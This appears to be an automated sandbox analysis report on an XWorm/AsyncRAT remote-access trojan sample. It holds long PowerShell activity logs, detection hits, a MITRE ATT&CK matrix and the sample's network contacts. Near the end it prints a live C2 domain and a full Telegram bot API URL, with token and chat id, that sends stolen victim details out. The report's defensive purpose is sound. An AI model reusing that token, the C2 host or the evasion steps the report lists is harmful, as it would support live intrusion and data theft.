                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftClient.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftClient.exe VolumeInformation
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001C028000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001BFBC000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001BF80000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3419695572.000000001D070000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3374595417.00000000012CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected XWorm
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 9RgE5uOJwX.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 9RgE5uOJwX.exe PID: 2732, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected XWorm
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 9RgE5uOJwX.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 9RgE5uOJwX.exe PID: 2732, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                          Windows Management Instrumentation                          		1
                          Registry Run Keys / Startup Folder                          		11
                          Process Injection                          		1
                          Masquerading                          		OS Credential Dumping221
                          Security Software Discovery                          		Remote Services11
                          Archive Collected Data                          		1
                          Web Service                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          PowerShell                          		1
                          DLL Side-Loading                          		1
                          Registry Run Keys / Startup Folder                          		11
                          Disable or Modify Tools                          		LSASS Memory1
                          Process Discovery                          		Remote Desktop ProtocolData from Removable Media11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                          DLL Side-Loading                          		131
                          Virtualization/Sandbox Evasion                          		Security Account Manager131
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin SharesData from Network Shared Drive1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                          Process Injection                          		NTDS1
                          Application Window Discovery                          		Distributed Component Object ModelInput Capture1
                          Ingress Tool Transfer                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Deobfuscate/Decode Files or Information                          		LSA Secrets1
                          File and Directory Discovery                          		SSHKeylogging2
                          Non-Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                          Obfuscated Files or Information                          		Cached Domain Credentials13
                          System Information Discovery                          		VNCGUI Input Capture13
                          Application Layer Protocol                          		Data Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                          Software Packing                          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545317 Sample: 9RgE5uOJwX.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 36 api.telegram.org 2->36 38 vehicle-temp.gl.at.ply.gg 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 54 10 other signatures 2->54 8 9RgE5uOJwX.exe 15 4 2->8         started        13 MicrosoftClient.exe 2->13         started        15 MicrosoftClient.exe 2->15         started        signatures3 52 Uses the Telegram API (likely for C&C communication) 36->52 process4 dnsIp5 40 api.telegram.org 149.154.167.220, 443, 49399 TELEGRAMRU United Kingdom 8->40 42 vehicle-temp.gl.at.ply.gg 147.185.221.23, 1930, 49406, 49407 SALSGIVERUS United States 8->42 34 C:\Users\user\AppData\...\MicrosoftClient.exe, PE32 8->34 dropped 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->56 58 Protects its processes via BreakOnTermination flag 8->58 60 Bypasses PowerShell execution policy 8->60 62 Adds a directory exclusion to Windows Defender 8->62 17 powershell.exe 23 8->17         started        20 powershell.exe 22 8->20         started        22 powershell.exe 23 8->22         started        24 powershell.exe 8->24         started        64 Multi AV Scanner detection for dropped file 13->64 66 Machine Learning detection for dropped file 13->66 file6 signatures7 process8 signatures9 44 Loading BitLocker PowerShell Module 17->44 26 conhost.exe 17->26         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        process10

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          9RgE5uOJwX.exe81%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                          9RgE5uOJwX.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\MicrosoftClient.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\MicrosoftClient.exe81%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://nuget.org/NuGet.exe0%URL Reputationsafe
                          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                          http://crl.microsoft0%URL Reputationsafe
                          http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                          https://contoso.com/0%URL Reputationsafe
                          https://nuget.org/nuget.exe0%URL Reputationsafe
                          https://contoso.com/License0%URL Reputationsafe
                          http://crl.mic0%URL Reputationsafe
                          https://contoso.com/Icon0%URL Reputationsafe
                          https://aka.ms/pscore680%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          vehicle-temp.gl.at.ply.gg
                          		147.185.221.23
                          		truetrue
                            		unknown
                            api.telegram.org
                            		149.154.167.220
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              vehicle-temp.gl.at.ply.ggtrue
                                		unknown
                                https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6true
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
